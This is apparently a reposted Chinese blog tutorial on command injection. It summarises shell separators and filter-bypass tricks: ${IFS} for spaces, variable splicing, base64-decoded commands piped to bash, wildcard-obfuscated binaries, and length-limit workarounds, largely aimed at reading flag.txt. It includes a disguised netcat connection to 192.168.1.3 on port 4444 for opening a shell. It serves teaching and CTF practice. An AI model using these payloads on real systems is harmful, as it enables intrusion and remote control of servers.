前言命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。 常用符号分号(;)多条语句顺序执行时的分割符号。 管道符(|) cmd1命令的输出,作为下一条命令cmd2的参数。 and(&&) 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 or(||) 或命令,cmd1失败则执行cmd2,cmd1成功则不执行cmd2 反引号()和$()反引号和$()都可用来表示命令,被这两种方式包含的字符串都会被当做命令首先执行。 12
| echo 'result : `whoami`'echo 'result : $(whoami)' |
绕过方式总结空格绕过在过滤了空格的系统中,以cat flag.txt为例,系统不允许我们输入空格或输入后被过滤。 ${IFS}可使用${IFS}代替空格。 123
| cat${IFS}flag.txtcat$IFS$1flag.txtcat${IFS}$1flag.txt |
重定向符绕过(<>)%09(需要php环境)php环境下web输入%09等效于空格 黑名单绕过拼接使用shell变量拼接被黑名单限制的关键词 1
| a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e; |
base64使用反引号包含base64解码后的命令 1
| `echo 'Y2F0IGZsYWcudHh0Cg==' | base64 -d` |
将base64解码后的命令通过管道符传递给bash 1
| echo 'Y2F0IGZsYWcudHh0Cg==' | base64 -d | bash |
单引号,双引号 反斜杠$1读文件绕过123456789101112
| (1)more:一页一页的显示档案内容(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页(3)head:查看头几行(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示(5)tail:查看尾几行(6)nl:显示的时候,顺便输出行号(7)od:以二进制的方式读取档案内容(8)vi:一种编辑器,这个也可以查看(9)vim:一种编辑器,这个也可以查看(10)sort:可以查看(11)uniq:可以查看(12)file -f:报错出具体内容 |
通配符绕过/???会去寻找 / 目录下的三个字符长度的文件,正常情况下会寻找到/bin,然后/?[a][t]会优先匹配到/bin/cat,就成功调用了cat命令,然后后面可以使用正常的通配符匹配所需读的文件,如flag.txt文件名长度为8,使用8个?’’,此命令就会读取所有长度为8的文件。 1
| /???/?[a][t] ?''?''?''?''?''?''?''?'' |
同理,我们也可以匹配/bin下的其他命令,如more,less,vi,tail等命令来查看文件,或者执行其他命令。 1
| /???/[m][o]?[e] ?''?''?''?''?''?''?''?'' |
1
| /???/[t]?[i][l] ?''?''?''?''?''?''?''?'' |
甚至开启一个shell 1
| /???/[n]?[t]??[t] -lvp 4444 |
1
| /???/[n]?[t]??[t] 192.168.1.3 4444 |
命令嵌套1
| echo 'result:$(uname -a)' |
长度绕过使用>>绕过长度限制使用>>每次添加一部分命令到文件中 1234
| echo -n 'cmd1' > r;echo -n 'cmd2' >> r;echo -n 'cmd3' >> r;echo 'cmd4' >> r; |
然后使用cat r | bash执行命令 使用换行执行和ls -t绕过长度限制linux中,文件中的命令如果需要换行书写,需要在前一行末尾增加\,如文件a中有 使用sh a即可执行命令cat flag.txt ls -t可根据时间创建顺序逆序输出文件名 a可以创建一个名为a的文件
按照这个思路,可以使用 1234
| > 'ag'> 'fl\\'> 't \\'> 'ca\\' |
然后使用ls -t > s s中文件内容就是 123456
| sca\t \fl\ag\其他的无关内容 |
之后使用sh s,即可执行cat flag 作者:Leticia,来源:Leticia's Blog
扫描关注乌云安全 觉得不错点个“赞”、“在看”哦
|